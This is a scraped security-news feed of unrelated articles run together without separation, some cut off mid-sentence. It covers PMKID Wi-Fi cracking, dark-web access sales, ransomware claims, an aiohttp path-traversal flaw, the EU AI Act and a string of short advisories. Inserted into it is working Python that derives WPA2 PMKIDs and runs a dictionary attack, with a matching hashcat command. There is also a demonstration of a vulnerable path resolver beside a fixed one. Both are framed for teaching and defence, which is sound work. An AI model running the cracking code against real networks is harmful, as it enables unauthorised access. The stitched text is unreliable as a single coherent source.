Being concerned about the security of your wireless network is not as paranoid as some may think. Many routers ship with a feature enabled by default that makes a WPA/WPA2-protected Wi-Fi network considerably easier to attack. In this post, we'll discuss one of the most effective methods of hacking wireless networks, which exploits that feature, and how to protect against it.

The simplest and most effective attack on WPA/WPA2-PSK: PMKID interception

PMKID interception is the most effective and easiest-to-execute attack on wireless networks protected by WPA/WPA2-PSK, and it is hard to notice: the attacker never has to wait for a legitimate client or knock one offline, and from the router's point of view the capture looks like a single device that started to connect and then gave up. In essence, the attack captures a value called the PMKID. It is not an encrypted password but a keyed hash derived from the network password, and the access point hands it to any device that begins associating with it, even when no legitimate device is connected. Having obtained the PMKID, the attacker tries candidate passwords offline until one reproduces it, and then connects to the Wi-Fi network.

This attack can also be carried out on a large scale using a technique called wardriving. The attacker drives around a city scanning all available wireless networks and collecting a PMKID from each router. Not much equipment is required: a laptop, a long-range Wi-Fi adapter, and a good antenna. The collected PMKIDs can be cracked on the go, but an attacker may prefer to wait until they're home and feed the whole haul into a password-cracking tool on a high-performance computer, or rent GPU capacity in the cloud.

The effectiveness of this attack was recently demonstrated in Hanoi: a Vietnamese hacker scanned around 10,000 wireless networks and recovered the passwords for half of them.

Image caption: This is all you need to hack 5000 wireless networks using PMKID interception.

How is it even possible to hack Wi-Fi using PMKID interception?

So why do access points hand out a hash of their Wi-Fi password to anyone who asks? The PMKID belongs to the PMK caching and fast-roaming machinery of 802.11 (PMKSA caching in 802.11i and fast BSS transition in 802.11r), which lets a client move between access points of the same network without repeating the full handshake. Most routers implement it and ship with it enabled, and such a router includes the PMKID in the very first message of the four-way handshake, before the connecting device has proved anything.

The PMKID is computed from the Pairwise Master Key (PMK). For WPA2-PSK it is the first 128 bits of HMAC-SHA1, keyed with the PMK, over the fixed string "PMK Name" followed by the access point's MAC address and the client's MAC address. The PMK itself, on a WPA/WPA2-PSK network, is derived from the Wi-Fi password with PBKDF2-HMAC-SHA1, using the network name (SSID) as the salt and 4096 iterations. Everything that goes into the PMKID except the password is therefore either fixed or visible on the air: the PMKID is, in effect, a salted hash of the password.

A hash cannot be reversed, and the designers of the standard relied on that. But a hash of a guessable password can be attacked by guessing: compute the PMKID for each candidate password and compare it with the captured one. Since people rarely choose strong passwords for wireless networks, often relying on fairly predictable combinations of characters, that guessing is frequently cheap. The designers of 802.11r evidently didn't take this into account. The attack was published in 2018 by the team behind Hashcat, one of the most popular password recovery utilities (in other words, a password-cracking tool), and tooling has since grown up around it: hcxdumptool for capturing PMKIDs and hashcat's mode 22000 for cracking them.

Image caption: Successful extraction of the password hashcat! from the intercepted PMKID of a wireless network.

Thus, in practice, the attacker captures the PMKID and runs a dictionary attack against it: candidate passwords from lists of commonly used passwords, usually with mangling rules applied, are hashed and compared. That is far cheaper than exhaustive brute force, and it is why password choice decides the outcome.

How to protect your wireless network from a PMKID attack

What can you do to prevent a PMKID interception attack on your wireless network? Fortunately, there are several protective measures that aren't too difficult to implement.

Create a password for your wireless network that is as long and random as possible. A captured PMKID gives the attacker an offline guessing target, so what protects you is how many guesses it takes: a dictionary word with a digit appended falls quickly, while a long random passphrase is out of reach even on rented GPUs. Note that the SSID acts as the salt, so a router with a common default network name and a default-style password is the easiest target of all.

Disable PMKID transmission in the router settings. Unfortunately, not all routers allow this, but it's worth checking whether yours has such a setting; look for options named PMKID, 802.11r, fast roaming, or fast BSS transition. Whether the setting actually takes effect can be verified by capturing the handshake of your own network and checking whether the first message still carries a PMKID.

Switch to WPA3. WPA3-Personal replaces the PSK handshake with SAE, in which the PMK results from an authenticated key exchange rather than from the password alone, so nothing the attacker can capture lets them test password guesses offline. Two caveats: all your devices must support it, and a router in WPA3/WPA2 mixed ("transition") mode still admits WPA2 clients with the same password, so the PMKID attack keeps working until WPA2 is switched off entirely.

Set up a guest network. Entering a long password on every new device is tedious, so keep the main network for trusted devices and put visitors on an isolated guest network. It's also a good idea to move potentially insecure things like IoT devices to the guest network. Bear in mind that a guest network's PMKID can be captured and cracked exactly the same way, so its password should still be reasonably strong; the benefit of the guest network is isolation, not weaker authentication.

Use the Devices on My Network feature, available in Kaspersky Plus and Kaspersky Premium. It shows a list of devices on your network and alerts you when a new device connects. For additional protection of transmitted data in case someone still manages to get onto your Wi-Fi, use a VPN on all your devices to secure the internet connection, for example Kaspersky Secure Connection, which is included in the Kaspersky Plus and Kaspersky Premium subscriptions.
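The derivation described above, carried through in code as an added example. This is not code from the original post, from hashcat or from any router firmware; the SSID, MAC addresses, passphrase and wordlist are constructed for the demonstration. It derives the PMK with PBKDF2-HMAC-SHA1 and the WPA2-PSK PMKID with HMAC-SHA1 over "PMK Name" || AP MAC || client MAC, writes the result in the hashcat 22000 line layout for PMKID entries (type 01), and then runs the dictionary attack the text describes against that line. WPA3 and the SHA-256-based AKMs are deliberately out of scope.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 iterations, 256-bit output (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID for WPA2-PSK (AKM 00-0F-AC:2): the first 128 bits of
    HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac_bytes(mac: str) -> bytes:
    """'02:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def to_hc22000(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """hashcat mode 22000 line for a PMKID entry (type 01). The trailing
    ANONCE, EAPOL and MESSAGEPAIR fields are only used for handshake entries."""
    return "WPA*01*{}*{}*{}*{}***".format(pmkid.hex(), ap_mac.hex(),
                                          sta_mac.hex(), ssid.encode("utf-8").hex())


def parse_hc22000(line: str):
    """Inverse of to_hc22000; returns (pmkid, ap_mac, sta_mac, ssid)."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a 22000 PMKID line")
    return (bytes.fromhex(fields[2]), bytes.fromhex(fields[3]),
            bytes.fromhex(fields[4]), bytes.fromhex(fields[5]).decode("utf-8"))


def crack_pmkid(line: str, wordlist):
    """Dictionary attack. SSID and both MACs come from the capture, so each
    candidate costs one PBKDF2 (4096 SHA-1 rounds) plus one HMAC; nothing
    else about the network is needed and the router is never contacted again."""
    pmkid, ap_mac, sta_mac, ssid = parse_hc22000(line)
    for candidate in wordlist:
        guess = derive_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, pmkid):
            return candidate
    return None


# Constructed sample "capture" for a network we control; not data from any real AP.
SAMPLE_SSID = "HomeNet-5G"
SAMPLE_PASSPHRASE = "sunshine1"           # weak on purpose: it is in the wordlist
SAMPLE_AP_MAC = mac_bytes("02:11:22:33:44:55")   # locally administered addresses
SAMPLE_STA_MAC = mac_bytes("02:66:77:88:99:aa")
SAMPLE_LINE = to_hc22000(
    derive_pmkid(derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID), SAMPLE_AP_MAC, SAMPLE_STA_MAC),
    SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_SSID)
SAMPLE_WORDLIST = ["password", "12345678", "qwertyuiop", "sunshine1", "letmein!!"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered passphrase:", crack_pmkid(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The same line can be handed to hashcat (`hashcat -m 22000 capture.22000 wordlist.txt`) and it will recover the same passphrase; the point of the pure-Python version is to make visible that the only secret input is the passphrase, and that the cost per guess is fixed by the standard (4096 SHA-1 rounds) rather than by anything the network owner controls other than password length.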
A threat actor has surfaced on the dark web announcing the creation of "Hell Paradise," a covert online platform purportedly dedicated to exploiting vulnerabilities in government websites and accessing sensitive data. The actor's posts name countries including the United Arab Emirates, Albania, Armenia, and Angola among the targets.

The actor's message to the BreachForums community reads like a manifesto, outlining the features and intentions behind "Hell Paradise." The platform is described as a repository of vulnerable government sites and associated data, categorized by country and vulnerability type. Claiming more than 1000 susceptible government websites across 49 countries, the actor presents "Hell Paradise" as a hub of potential exploits and invites users to explore and exploit the disclosed weaknesses.

Central to the pitch is a three-way classification: Vulnerabilities, Exposed Gits, and Exposed Env files. The first covers critical and high-severity bugs such as remote code execution (RCE), local file inclusion (LFI), and SQL injection (SQLi). The other two refer to publicly reachable .git directories and .env configuration files, a common misconfiguration that leaks source code, database credentials and API keys without any exploit at all.

Access Restrictions: Imposing Financial Barriers

Access to "Hell Paradise" is not free. The actor charges a $50 registration fee, ostensibly to deter spam and abuse of the platform and to keep some control over who sees the listed vulnerabilities. The actor also assures users that the platform stores no data and requires only an email address for registration. The accompanying recommendation to use a disposable email service such as cock.li underlines the clandestine nature of the operation and raises questions about its true intentions.

The emergence of "Hell Paradise" underlines the exposure of governmental web infrastructure worldwide. With malicious actors increasingly targeting critical systems and sensitive data, the potential for widespread disruption and data compromise is a cause for concern.

Implications of "Hell Paradise": Potential Security Breaches

If the claims prove true, the implications could be severe and far-reaching. Governments and agencies could face breaches exposing sensitive data, including personal records and classified material, undermining public trust and creating diplomatic tensions between affected countries. Exploitation of critical vulnerabilities in government websites could also disrupt essential services, financial systems, and infrastructure. The fallout would require urgent and coordinated work by security teams and government authorities to assess the extent of the damage, apply mitigations, and prevent further intrusions; in the case of exposed .git and .env files, that means taking the files offline and rotating every credential they contained, since the secrets must be assumed copied. As the security community weighs the implications of "Hell Paradise," collaboration and vigilance remain necessary against cybercriminals and state-sponsored actors alike. Stay tuned for further updates as this story continues to unfold.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
A dark web actor is reportedly selling access to an Indonesian energy company and is believed to be the same threat actor who recently offered access to an American manufacturer. The Indonesian company found itself at the center of the energy sector threat, according to posts circulating on dark web forums. The initial post did not name the organization but highlighted its revenue, put at over 65 trillion Indonesian rupiah, which the post equated to over $417 million (at 2024 exchange rates 65 trillion rupiah is closer to $4 billion, so one of the two figures in the listing is off by an order of magnitude).

Energy Sector Threat: Access to Unnamed Indonesian Energy Giant

The threat actor offered access to the company's systems, purportedly through a popular network security product used by organizations for perimeter protection, for an asking price of $800. This follows a trend of attacks on critical infrastructure, particularly in the oil and electricity sectors. Just recently, the same threat actor was observed selling unauthorized access to an American manufacturing company with revenues of $2.7 billion; that access, which included ScreenConnect and RDP credentials, was priced at $5,000.

These listings illustrate the growing initial-access market that feeds ransomware groups and the exposure of essential industries to it. Sangfor Technologies has emphasized the escalating risks posed by cyberattacks in sectors reliant on digital systems, such as oil and gas.

Cyberattacks on the Oil and Gas Industry

The oil and gas industry has become a prime target for cybercriminals because of its heavy reliance on technology to manage complex operations. Digital systems bring efficiency and safety benefits, but they also present significant security challenges. According to Statista, the oil and gas sector ranked fifth among industries most affected by ransomware attacks in 2022, with 21 reported incidents globally. The sector's reliance on digital systems for extraction, transportation, and refining makes it an attractive target.

A report by the US Government Accountability Office highlighted the cybersecurity risks faced by offshore oil and gas infrastructure, citing vulnerabilities in operational technology (OT) systems that could allow threat actors to compromise critical functions, with serious safety and environmental consequences. CISA has issued advisories addressing vulnerabilities in operational technology, including weak encryption and insecure firmware updates. Regulators such as the US Department of the Interior's Bureau of Safety and Environmental Enforcement have meanwhile been criticized for perceived inadequacies in addressing cybersecurity threats.
Carlsbad, California: Encina Wastewater Authority (EWA) has been named as a target by the BlackByte ransomware group. The threat actor, known for its aggressive tactics, posted a message on its leak site claiming the Encina Wastewater Authority cyberattack and offering company documents obtained during the intrusion for sale.

Despite the group's claims, the Encina Wastewater Authority website, http://encinajpa.com, remained operational without visible signs of intrusion. That is not unusual: a ransomware intrusion typically targets internal systems, file shares and databases rather than the public website, so an unaffected front end says little about whether the claim is true.

Decoding the Encina Wastewater Authority Cyberattack

Encina Wastewater Authority (EWA) in Carlsbad, California, serves over 379,000 residents and businesses across North San Diego County, covering a 125-square-mile area. EWA provides wastewater treatment, resource recovery, and environmental protection, vital for public health and regional water sustainability. The Cyber Express has reached out to Encina Wastewater Authority for clarification regarding the alleged cyberattack. At the time of writing, no official statement or response has been issued by the organization, leaving the claims unconfirmed.

The BlackByte ransomware group has also published sample documents alongside its claim. "Company documents, deletion/purchase. If you are interested in purchasing the data or requesting to remove it, Please connect us through our Email", reads the threat actor's post.

The Rise of BlackByte Ransomware Group

The BlackByte ransomware group has been on the radar of cybersecurity agencies since its emergence in July 2021. Known for targeting critical infrastructure, BlackByte drew the attention of the Federal Bureau of Investigation (FBI) and the US Secret Service within its first year of operation. By November 2021, the group had already attacked government facilities, financial institutions, and the food and agriculture sector.

Despite efforts to counter BlackByte, such as the release of a decrypter by Trustwave in October 2021, the group continued to evolve. Its developers released newer versions of the ransomware that use multiple encryption keys and warned victims against using the available decrypters. BlackByte currently operates on a ransomware-as-a-service (RaaS) model with affiliates targeting organizations worldwide; like many ransomware families, it avoids targeting entities based in Russia.

As for the Encina Wastewater Authority cyberattack claims, The Cyber Express will be closely monitoring the situation and will update this post once more information on the alleged attack, or an official statement from the organization, becomes available.
In the final week of January 2024, Cyble Global Sensor Intelligence (CGSI) observed scanning for an aiohttp vulnerability by the ShadowSyndicate group (formerly Infra Storm). The vulnerability, CVE-2024-23334, affects aiohttp versions before 3.9.2 and lets an unauthenticated remote attacker read files outside the directory an aiohttp server was configured to serve, through directory traversal. aiohttp is a widely used asynchronous HTTP client/server library for Python, and Cyble counted more than 43,000 internet-exposed instances, which makes it an attractive target for threat actors.

ShadowSyndicate Group Exploits Aiohttp Vulnerability

Exposed aiohttp instances were most common in the United States, Germany, and Spain. Updating to the latest version was the primary recommendation for reducing the risk. According to Cyble Research and Intelligence Labs (CRIL), CVE-2024-23334 carries a CVSS score of 7.5 (High). A proof of concept (PoC) and instructional videos demonstrating it circulated online, and shortly after they became public CGSI detected multiple scanning attempts aimed at the vulnerability.

Technical Analysis of the Aiohttp Vulnerability

The flaw is in aiohttp's static file serving. When a static route is registered with the follow_symlinks option set to True, vulnerable versions did not check that the requested file, once resolved, still lies under the configured root directory. A request containing ../ segments could therefore escape the root and read any file the server process can read. Symbolic links are the reason the option exists, but they are not needed for the traversal itself, which is why the advisory notes that the attack works even when no symlinks are present. Static routes with the default follow_symlinks=False are not affected. Version 3.9.2 adds the containment check; keeping follow_symlinks off, or serving static files from a reverse proxy instead of aiohttp, are the recommended mitigations for anyone who cannot upgrade immediately.

Further investigation into the scanning attempts attributed one IP address, 81[.]19[.]136[.]251, to the ShadowSyndicate group. The group is known for its involvement in ransomware operations dating back to 2022, spanning Quantum, Nokoyawa and ALPHV ransomware campaigns, which shows its adaptability and persistence. No attacks actually exploiting the aiohttp vulnerability had been observed at the time, but the scanning by ShadowSyndicate underlines the exposure of unpatched systems.
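The bug class behind CVE-2024-23334, as an added example that is not aiohttp's code and not the PoC mentioned above: a naive resolver that joins the URL path onto the static root and follows symlinks with no containment check, beside a hardened resolver that rejects anything resolving outside the root. The directory layout (a served `public/` tree, a `secret.txt` outside it, and two symlinks) is constructed in a temporary directory for the demonstration; the function names are this example's own. The same check is what an upgrade to aiohttp 3.9.2 gives you for `add_static(..., follow_symlinks=True)`.

```python
import os
import tempfile


def naive_resolve(root: str, requested: str) -> str:
    """The bug class: join the URL path onto the static root and resolve it,
    never checking that the result is still under root. "../secret.txt"
    resolves to a file outside the directory being served."""
    return os.path.realpath(os.path.join(root, requested.lstrip("/")))


def resolve_within_root(root: str, requested: str, follow_symlinks: bool = False):
    """Hardened mapping from URL path to filesystem path. Returns the resolved
    path, or None when the request must be rejected (traversal, a symlink when
    symlinks are not allowed, or a symlink whose target leaves the root)."""
    root_real = os.path.realpath(root)
    candidate = os.path.normpath(os.path.join(root_real, requested.lstrip("/")))
    # Lexical containment first: catches "../" regardless of what exists on disk.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    resolved = os.path.realpath(candidate)
    if resolved != candidate:
        # Some path component is a symlink.
        if not follow_symlinks:
            return None
        # Following symlinks is allowed, but the target must stay inside root too.
        if os.path.commonpath([root_real, resolved]) != root_real:
            return None
    return resolved


def build_fixture() -> str:
    """Constructed layout (returns the served directory):
        <tmp>/secret.txt                  outside the served tree
        <tmp>/public/index.html           served
        <tmp>/public/alias -> index.html  symlink staying inside the tree
        <tmp>/public/leak  -> ../secret.txt   symlink escaping the tree
    """
    base = tempfile.mkdtemp(prefix="static-demo-")
    public = os.path.join(base, "public")
    os.mkdir(public)
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("not for the web\n")
    with open(os.path.join(public, "index.html"), "w") as f:
        f.write("<h1>hello</h1>\n")
    os.symlink("index.html", os.path.join(public, "alias"))
    os.symlink(os.path.join("..", "secret.txt"), os.path.join(public, "leak"))
    return public


def demo() -> dict:
    """Run both resolvers over the fixture; each value is True when the
    resolver behaved as described in its docstring."""
    public = build_fixture()
    base = os.path.dirname(os.path.realpath(public))
    secret = os.path.join(base, "secret.txt")
    index = os.path.join(os.path.realpath(public), "index.html")
    return {
        "naive_escapes": naive_resolve(public, "../secret.txt") == secret,
        "naive_follows_leak": naive_resolve(public, "leak") == secret,
        "index_ok": resolve_within_root(public, "/index.html") == index,
        "traversal_blocked": resolve_within_root(public, "../secret.txt") is None,
        "symlink_blocked_by_default": resolve_within_root(public, "leak") is None,
        "escaping_symlink_blocked":
            resolve_within_root(public, "leak", follow_symlinks=True) is None,
        "internal_symlink_ok":
            resolve_within_root(public, "alias", follow_symlinks=True) == index,
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print("{:<28} {}".format(name, "ok" if ok else "FAIL"))
```

Note the order of the two checks: the lexical check on the normalized path rejects traversal before anything touches the filesystem, and the realpath comparison afterwards is what makes following symlinks safe. Dropping either one reproduces the vulnerable behaviour for one of the two request kinds.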
The European Parliament has approved the Artificial Intelligence (AI) Act, a pivotal step towards regulating AI technologies while fostering innovation and safeguarding fundamental rights. The AI Act, negotiated with member states in December 2023, passed with 523 votes in favor, 46 against, and 49 abstentions. At its core, the Act aims to protect fundamental rights, democracy, the rule of law, and environmental sustainability while keeping Europe at the forefront of AI innovation.

Brando Benifei, co-rapporteur of the Internal Market Committee (S&D, Italy), highlighted the historic nature of the legislation during the plenary debate, stating, "We finally have the world's first binding law on artificial intelligence, to reduce risks, create opportunities, combat discrimination, and bring transparency. Thanks to Parliament, unacceptable AI practices will be banned in Europe and the rights of workers and citizens will be protected. The AI Office will now be set up to support companies to start complying with the rules before they enter into force. We ensured that human beings and European values are at the very centre of AI's development."

AI Act: Protecting Rights and Prohibiting Harmful Applications

The AI Act establishes obligations graded by the potential risk and impact of an AI system, seeking a balance between protection and innovation. One of its key provisions is the prohibition of AI applications that threaten citizens' rights. Banned practices include biometric categorization systems based on sensitive characteristics; untargeted scraping of facial images from the internet or CCTV footage to build facial recognition databases; emotion recognition in workplaces and schools; social scoring; predictive policing based solely on profiling individuals; and AI that manipulates human behavior or exploits people's vulnerabilities.

Stricter Controls for Law Enforcement

The legislation imposes stringent controls on the use of remote biometric identification (RBI) systems by law enforcement agencies. "Real-time" RBI may be deployed only in narrowly defined situations, such as targeted searches for missing persons or the prevention of terrorist attacks, with limits on time and geographic scope and with prior judicial or administrative authorization.

High-risk AI systems, identified by their potential to harm health, safety, fundamental rights, and democracy, are subject to clear obligations: risk assessment and reduction, transparency, accuracy, and human oversight. Citizens have the right to submit complaints about AI systems that affect their rights and to receive explanations for decisions made by such systems. General-purpose AI (GPAI) systems must meet transparency requirements, including compliance with EU copyright law and publication of detailed summaries of their training data; the more powerful models face additional requirements, such as model evaluations and incident reporting.

Supporting Innovation and SMEs

Measures to support innovation, such as regulatory sandboxes and real-world testing, will be established at the national level so that SMEs and startups can develop AI solutions before they are placed on the market.

AI Act: The Path Forward

The regulation is undergoing final legal-linguistic checks and awaits formal endorsement by the Council; it is expected to be adopted before the end of the legislative session. It will enter into force twenty days after publication in the Official Journal of the EU, with full implementation expected within 24 to 36 months. The Act responds directly to citizens' proposals from the Conference on the Future of Europe (COFE), addressing competitiveness, trustworthiness, and digital innovation while upholding fundamental rights and transparency.

Dragos Tudorache, co-rapporteur of the Civil Liberties Committee (Renew, Romania), remarked, "The EU has delivered. We have linked the concept of artificial intelligence to the fundamental values that underpin our societies. However, significant work lies ahead beyond the AI Act itself. AI compels us to reassess the social contract at the core of our democracies, our educational paradigms, labor markets, and even the conduct of warfare. The AI Act serves as a cornerstone for a novel governance model centered around technology. Our focus must now shift towards translating this legislation into action."

The approval of the Artificial Intelligence Act marks a pivotal moment in the EU's efforts to regulate AI, attempting to nurture innovation while safeguarding fundamental rights.
All companies — not just federal agencies — should aim to adopt the "network and environment" pillar of the National Security Agency's zero-trust guidelines.
Like Spectre, the new GhostRace exploit could give attackers a way to access sensitive information from system memory and take other malicious actions.
The Pentagon is set to open its new Office of the Assistant Secretary of Defense for Cyber Policy on March 18. This office is a response to a congressionally mandated effort to elevate the military's focus on cybersecurity.
Cisco recently addressed several high-severity vulnerabilities in its IOS XR software, including three that can lead to privilege escalation or denial-of-service (DoS) conditions.
Security researchers at DoControl observed a significant rise in software-as-a-service (SaaS) assets, with an average of 286,000 new assets generated weekly in 2023, a 189% surge from the previous year.
The Cybercrime Atlas initiative, a collaborative effort involving law enforcement agencies, private-sector firms, and other organizations, aims to disrupt cybercriminals by mapping out relationships between criminal groups and their infrastructure.
Cybercriminals are bypassing traditional SIM swapping methods by exploiting vulnerabilities in eSIM activation processes and using stolen credentials to initiate the porting of phone numbers to their own devices.
The attack chain involves phishing emails with malicious attachments, the use of curl and Program Compatibility Assistant (PCA) in Windows to deliver and execute malicious payloads, and unauthorized command execution using Impacket.
The Standard version of Safe Browsing has been updated to support real-time data lookup, as many unsafe sites exist for less than 10 minutes, slipping through locally stored lists.
The FCC intends for the label to apply to a range of products, including home security cameras, internet-connected appliances, fitness trackers, garage door openers, baby monitors, and voice-activated devices.
The US House of Representatives has passed a bill requiring ByteDance, the parent company of TikTok, to sell the social media platform within 165 days or face a complete ban in the United States.
StopCrypt ransomware, also known as STOP Djvu, has evolved with a new multi-stage execution process involving shellcodes to evade security tools. Unlike ransomware operations targeting businesses, StopCrypt primarily targets consumers.
Arcserve has addressed critical security vulnerabilities (CVE-2024-0799, CVE-2024-0800) in its Unified Data Protection (UDP) solution, which could be exploited to upload malicious files to the underlying Windows system.
The DarkGate malware operation launched a new wave of attacks exploiting a recently patched Windows Defender SmartScreen bypass (CVE-2024-21412). Trend Micro analysts report that DarkGate operators use the flaw to improve their malware distribution; the same vulnerability was earlier exploited in a campaign that delivered the DarkMe malware to financial traders' systems. Users are urged to apply the available security patches.
Tech support businesses Restoro and Reimage settled with the FTC for $26 million after being accused of using scare tactics to swindle consumers out of money for unnecessary services.
Researchers at IBM and VU Amsterdam have published a study on GhostRace, a new attack that exploits speculative race conditions (SRCs); it is tracked as CVE-2024-2193.
The Mobile Security Framework (MobSF) offers both static analysis for mobile app binaries and dynamic analysis for Android and iOS applications, streamlining security assessments.
UnitedHealth Group reportedly identified the source of the cyberattack on its subsidiary, Change Healthcare. The company has conducted a forensic analysis and established a safe restore point to move forward with the restoration of data and systems.
In response to the cyberattack, Neil Gray, the Scottish health secretary, confirmed that established procedures are being followed to address the situation, and support is being provided to NHS Dumfries and Galloway.
Alabama's state and city governments have been grappling with cyber incidents and network disruptions, impacting critical systems such as law enforcement's ability to verify stolen vehicles.
A new report by BlackBerry revealed that 62% of industry-related cyberattacks from September to December 2023 were directed at critical infrastructure providers. The use of novel malware saw a 27% increase.
Ubuntu Security Notice 6694-1 - It was discovered that Expat could be made to consume large amounts of resources. If a user or automated system were tricked into processing specially crafted input, an attacker could possibly use this issue to cause a denial of service.
Debian Linux Security Advisory 5632-1 - It was discovered that composer, a dependency manager for the PHP language, processed files in the local working directory. This could lead to local privilege escalation or malicious code execution. Due to a technical issue this email was not sent on 2024-02-26 like it should have.
Financials by Coda versions prior to 2023Q4 suffer from an incorrect access control authorization bypass vulnerability. The Change Password feature can be abused in order to modify the password of any user of the application.
Ubuntu Security Notice 6695-1 - It was discovered that TeX Live incorrectly handled certain memory operations in the embedded axodraw2 tool. An attacker could possibly use this issue to cause TeX Live to crash, resulting in a denial of service. This issue only affected Ubuntu 20.04 LTS. It was discovered that TeX Live allowed documents to make arbitrary network requests. If a user or automated system were tricked into opening a specially crafted document, a remote attacker could possibly use this issue to exfiltrate sensitive information, or perform other network-related attacks. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.
Red Hat Security Advisory 2024-1332-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 7. Issues addressed include a use-after-free vulnerability.
Red Hat Security Advisory 2024-1328-03 - Red Hat Advanced Cluster Management for Kubernetes 2.9.3 General Availability release images, which fix bugs and update container images. Issues addressed include denial of service and traversal vulnerabilities.
Red Hat Security Advisory 2024-1327-03 - An update for the gimp:2.8 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.
Debian Linux Security Advisory 5640-1 - Two vulnerabilities were discovered in Open vSwitch, a software-based Ethernet virtual switch, which could result in a bypass of OpenFlow rules or denial of service.
Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.
Nissan Motor Corporation and Nissan Financial Services in Australia and New Zealand, collectively known as Nissan Oceania, have started reaching out to individuals affected by a recent cyberattack that targeted its local operations. The organization anticipates formally notifying approximately 100,000 individuals about the Nissan cyberattack in the coming weeks, although this number may be subject to adjustments as contact details are verified and duplicate entries are removed. Acknowledging the distress and concern the Nissan cyberattack may cause, the company extends its sincere apologies to the affected community. The company is committed to promptly informing affected individuals about the specific information compromised, the support available to them, and steps they can take to mitigate risks such as identity theft, scams, or fraud. “We know this will be difficult news for people to receive, and we sincerely apologize to our community for any concerns or distress it may cause. We are committed to contacting affected individuals as soon as possible to tell them what information was involved, how we are supporting them, and the steps they can take to protect themselves against the risk of harm, identity theft, scams, or fraud,” reads Nissan’s Official Statement. Identifying Affected Stakeholders in the Nissan Cyberattack The scope of those affected encompasses a range of stakeholders, including Nissan customers (including customers of Mitsubishi, Renault, Skyline, Infiniti, LDV, and RAM branded finance businesses), dealers, as well as current and former employees. “The fact that around 10,000 were believed to have had seriously critical PII data stolen, such as driving licenses and Medicare cards, as a result of the Nissan cyberattack, is really quite concerning. The perpetrators of this attack managed to steal confidential data and will surely try to blackmail the victims endlessly for extortion purposes,” said Darren Williams, CEO and Founder of Blackfog. “They were able to evade the security tools at the front door and remain hidden in the system of a multinational global brand for months, highlighting the sophistication of today’s cybercriminals.
To really reduce the chance of data breaches, organizations need to look beyond perimeter defense and focus on securing the back door with anti data exfiltration solutions,” Williams added. The Nissan cyberattack, which occurred on December 5, 2023, involved a malicious third party gaining unauthorized access to the company’s local IT servers. The compromised data varies for each individual, with initial estimates suggesting that up to 10% of those notified have had some form of government identification compromised. This includes approximately 4,000 Medicare cards, 7,500 driver’s licenses, 220 passports, and 1,300 tax file numbers. For the remaining 90% of individuals, other personal information such as loan-related transaction statements, employment or salary details, and dates of birth have been impacted. Support Measures Implemented Immediate actions were taken by the organization to contain the Nissan cyberattack, followed by prompt notifications to relevant government authorities, including the Australian and New Zealand national cyber security centers and privacy regulators. Since the discovery of the cyber incident, Nissan has been collaborating closely with government agencies and external cyber forensic experts to assess the compromised data and understand its impact on individuals within the community. Nissan has implemented several measures to assist affected individuals, including partnerships with reputable organizations such as IDCARE, Australia and New Zealand’s national identity and cyber support community service. IDCARE will provide expert guidance and support to impacted individuals, addressing concerns about potential misuse of personal information. Additionally, free credit monitoring services will be provided through Equifax in Australia and Centrix in New Zealand to help individuals detect any fraudulent activity.
Nissan will also reimburse the costs associated with replacing primary identity documents where advised by the relevant government agency. To further support affected individuals, Nissan has established dedicated customer support lines in Australia and New Zealand, operational on weekdays from 7 am to 7 pm AEDT. These lines will provide assistance to those who have received notifications regarding the breach. In addition to the support measures outlined, Nissan advises affected individuals to remain vigilant against potential threats by avoiding suspicious online activity, refraining from clicking on unfamiliar links or opening suspicious emails, and verifying the authenticity of communications received. It is recommended to update passwords regularly, use strong and unique passwords for different accounts, enable multi-factor authentication where available, and report any suspicious activities to relevant authorities. Nissan remains committed to transparency and proactive engagement as it navigates through the aftermath of this cyber incident, prioritizing the welfare and security of its customers, partners, and employees. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Chinese users looking for legitimate software such as Notepad++ and VNote on search engines like Baidu are being targeted with malicious ads and bogus links to distribute trojanized versions of the software and ultimately deploy Geacon, a Golang-based implementation of Cobalt Strike. “The malicious site found in the notepad++ search is distributed through an advertisement block,” Kaspersky
Google on Thursday announced an enhanced version of Safe Browsing to provide real-time, privacy-preserving URL protection and safeguard users from visiting potentially malicious sites. “The Standard protection mode for Chrome on desktop and iOS will check sites against Google’s server-side list of known bad sites in real-time,” Google’s Jonathan Li and Jasika Bawa said. “If we
